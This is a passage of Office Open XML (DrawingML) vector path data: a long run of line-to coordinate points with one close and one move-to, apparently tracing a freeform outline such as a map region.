                      <a:pt x="1286" y="1545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="1548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="1552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1282" y="1559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1291" y="1555"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1294" y="1554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="1552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1308" y="1543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1317" y="1537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1325" y="1536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1329" y="1539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1332" y="1543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1329" y="1548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1329" y="1550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1332" y="1553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1336" y="1551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="1549"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="1551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1351" y="1557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="1560"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="1562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1351" y="1567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1351" y="1571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1348" y="1576"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1355" y="1587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1352" y="1592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1347" y="1595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="1602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1334" y="1605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="1606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1320" y="1607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1309" y="1608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1306" y="1613"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1300" y="1622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1295" y="1626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1291" y="1630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="1632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="1634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1260" y="1636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1250" y="1635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1235" y="1634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1232" y="1634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1225" y="1635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1217" y="1635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1204" y="1634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="1633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1185" y="1635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1181" y="1637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1177" y="1640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1173" y="1647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1172" y="1653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1170" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1166" y="1659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1158" y="1660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1154" y="1661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1146" y="1667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1141" y="1673"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1135" y="1680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1133" y="1684"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="1686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1124" y="1695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1121" y="1701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1118" y="1704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1115" y="1710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1111" y="1720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1116" y="1713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1119" y="1711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1124" y="1706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="1696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1139" y="1688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1154" y="1678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1163" y="1673"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1175" y="1668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1183" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1190" y="1663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1201" y="1661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1207" y="1662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1214" y="1665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1217" y="1668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="1670"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1219" y="1675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="1678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1216" y="1680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="1683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1203" y="1688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1199" y="1688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="1686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="1686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1183" y="1688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1185" y="1689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="1692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="1693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="1698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="1699"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1206" y="1694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1206" y="1696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="1694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1212" y="1696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="1698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="1701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="1704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1207" y="1704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1207" y="1706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1200" y="1711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="1711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1210" y="1713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="1716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="1721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1210" y="1720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="1721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="1723"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="1725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1214" y="1729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1214" y="1731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="1732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1221" y="1732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1226" y="1733"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1224" y="1735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1221" y="1735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1221" y="1736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1225" y="1737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1226" y="1740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1230" y="1739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1231" y="1740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1233" y="1740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1234" y="1742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1237" y="1742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1236" y="1741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1242" y="1741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1244" y="1742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1243" y="1744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245" y="1743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1247" y="1744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1248" y="1743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="1740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1255" y="1739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1256" y="1743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1259" y="1744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1263" y="1743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1266" y="1747"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1263" y="1750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1264" y="1751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1270" y="1751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1271" y="1753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1267" y="1754"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1266" y="1753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1264" y="1754"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1265" y="1755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1261" y="1755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1259" y="1755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1260" y="1757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="1757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="1758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1254" y="1758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="1760"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1250" y="1760"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1248" y="1763"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1247" y="1762"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1242" y="1764"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1241" y="1765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1237" y="1766"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1237" y="1764"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1235" y="1765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1233" y="1767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1232" y="1765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1232" y="1768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1230" y="1769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1229" y="1771"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1226" y="1771"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1225" y="1770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1224" y="1769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1224" y="1766"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1222" y="1769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1221" y="1771"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="1768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="1768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="1771"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1216" y="1771"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="1772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1219" y="1774"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="1775"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1217" y="1775"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="1779"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1212" y="1781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1210" y="1782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="1782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="1785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="1783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="1785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1207" y="1786"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1206" y="1785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1207" y="1787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1205" y="1788"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1204" y="1787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1203" y="1787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1203" y="1788"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="1787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1200" y="1790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1199" y="1793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1198" y="1790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="1792"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="1790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1192" y="1785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1191" y="1787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="1779"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1191" y="1771"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="1770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="1768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1191" y="1770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="1772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="1771"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="1766"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="1768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="1767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="1766"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1203" y="1760"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1210" y="1755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1215" y="1751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="1752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1217" y="1756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="1756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="1759"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="1757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="1755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1224" y="1753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1229" y="1751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1231" y="1752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1232" y="1751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1231" y="1750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1227" y="1750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1222" y="1750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1219" y="1750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1214" y="1749"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="1750"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1210" y="1751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="1752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="1749"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1216" y="1744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1217" y="1742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="1741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="1739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1214" y="1742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1215" y="1740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="1735"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1214" y="1740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="1745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="1745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="1753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="1754"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1190" y="1752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="1751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1190" y="1753"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1184" y="1757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1183" y="1756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1176" y="1755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1175" y="1757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1172" y="1754"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="422" y="855"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="428" y="854"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="838"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="460" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="870"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="869"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="868"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="479" y="863"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="858"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="834"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="855"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="892"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="900"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="893"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="855"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="822"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="814"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="824"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="846"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="853"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="870"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="885"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="891"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="909"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="915"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="928"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="935"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="938"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="955"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="961"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="613" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="975"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="983"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="1000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="628" y="1000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="995"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="607" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="999"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="1001"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="1015"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="607" y="1014"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="1011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="1009"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="1032"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="601" y="1036"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="1036"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="1035"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="1030"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="1020"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="1015"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="550" y="1009"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="1008"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="1010"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="1017"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="1028"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="1030"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="1038"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="1045"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="475" y="1046"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="1047"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="1046"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="1048"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="1048"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="1042"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="1033"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="1031"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="1021"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="1017"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="1014"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="1011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="1007"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="997"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="985"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="984"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="978"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="974"/>
                    </a:lnTo>
